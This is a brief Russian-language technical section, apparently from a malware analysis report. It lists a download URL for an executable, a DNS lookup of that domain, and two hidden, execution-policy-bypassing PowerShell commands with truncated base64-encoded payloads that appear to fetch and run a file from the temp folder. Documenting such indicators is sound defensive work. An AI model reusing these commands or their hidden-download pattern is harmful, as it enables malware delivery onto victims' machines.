Техническая информация
- http://worldnit.com/abu.exe как $deploylocation
- '<SYSTEM32>\cmd.exe' /c powershell.exe -ep bypass -noni -w hidden -enc KAAkAGQAZQBwAGwAbwB5AGwAbwBjAGEAdABpAG8AbgA9ACQAZQBuAHYAOgB0AGUAbQBwACsAJwBmAGwAZQBlAGIALgBlAHgAZQAnACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHk...
- DNS ASK wo###nit.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -ep bypass -noni -w hidden -enc KAAkAGQAZQBwAGwAbwB5AGwAbwBjAGEAdABpAG8AbgA9ACQAZQBuAHYAOgB0AGUAbQBwACsAJwBmAGwAZQBlAGIALgBlAHgAZQAnACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHk...' (со скрытым окном)